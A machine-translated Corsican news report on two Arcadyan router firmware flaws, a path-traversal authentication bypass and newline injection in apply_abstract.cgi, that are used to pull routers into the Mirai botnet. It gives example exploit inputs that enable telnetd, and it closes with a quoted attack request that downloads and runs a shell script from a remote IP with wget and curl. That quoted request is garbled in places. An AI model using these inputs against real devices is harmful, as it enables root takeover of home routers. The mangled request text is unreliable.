Vulnerabilità in i router di casa chì afectanu 17 fabricatori

Un attaccu massivu hè statu registratu nantu à a reta contr'à i routers di casa chì u firmware usa una implementazione di u servitore HTTP da a cumpagnia Arcadyan. Per acquistà u cuntrollu di i dispositi, una cumminazione di duie vulnerabili hè aduprata chì permette l'esekzione remota di codice arbitrariu cù diritti di root. U prublema tocca una larga gamma di routers ADSL da Arcadyan, ASUS è Buffalo, è ancu i dispositi furniti sottu i marchi Beeline (u prublema hè cunfirmatu in Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone è altri operatori di telecomunicazione. Hè nutatu chì u prublema hè stata prisente in u firmware Arcadyan per più di 10 anni è in questu tempu hà sappiutu migrate à almenu 20 mudelli di dispusitivi da 17 diversi fabricatori.

A prima vulnerabilità, CVE-2021-20090, permette di accede à qualsiasi script d'interfaccia web senza autentificazione. L'essenza di a vulnerabilità hè chì in l'interfaccia web, certi cartulari attraversu quale l'imaghjini, i schedari CSS è i script JavaScript sò mandati sò accessibili senza autentificazione. In questu casu, i cartulari per i quali l'accessu senza autentificazione hè permessu sò verificati cù a maschera iniziale. Specificà i caratteri "../" in i percorsi per andà in u cartulare parent hè bluccatu da u firmware, ma utilizendu a cumminazzioni "..%2f" hè saltata. Cusì, hè pussibule apre e pagine prutette quandu inviendu dumande cum'è "http://192.168.1.1/images/..%2findex.htm".

A seconda vulnerabilità, CVE-2021-20091, permette à un utilizatore autentificatu per fà cambiamenti à i paràmetri di u sistema di u dispusitivu mandendu paràmetri appiccicamente furmatu à l'script apply_abstract.cgi, chì ùn verifica micca a presenza di un caratteru newline in i paràmetri. . Per esempiu, quandu esegue una operazione ping, un attaccu pò specificà u valore "192.168.1.2%0AARC_SYS_TelnetdEnable=1" in u campu cù l'indirizzu IP verificatu, è u script, quandu crea u schedariu di paràmetri /tmp/etc/config/ .glbcfg, scriverà a linea "AARC_SYS_TelnetdEnable = 1" in questu ", chì attiva u servitore telnetd, chì furnisce l'accessu di shell di cumanda senza restrizioni cù diritti di root. In listessu modu, stabilisce u paràmetru AARC_SYS, pudete eseguisce qualsiasi codice in u sistema. A prima vulnerabilità permette di eseguisce un script problematicu senza autentificazione accedendu cum'è "/images/..%2fapply_abstract.cgi".

Per sfruttà e vulnerabilità, un attaccu deve esse capace di mandà una dumanda à u portu di a rete nantu à quale l'interfaccia web hè in esecuzione. A ghjudicà da a dinamica di a diffusione di l'attaccu, assai operatori lascianu accessu à i so dispositi da a reta esterna per simplificà u diagnosticu di prublemi da u serviziu di supportu. Se l'accessu à l'interfaccia hè limitatu solu à a reta interna, un attaccu pò esse realizatu da una reta esterna cù a tecnica "DNS rebinding". Vulnerabilità sò digià aduprate attivamente per cunnette i routers à a botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

Source: opennet.ru

Add a comment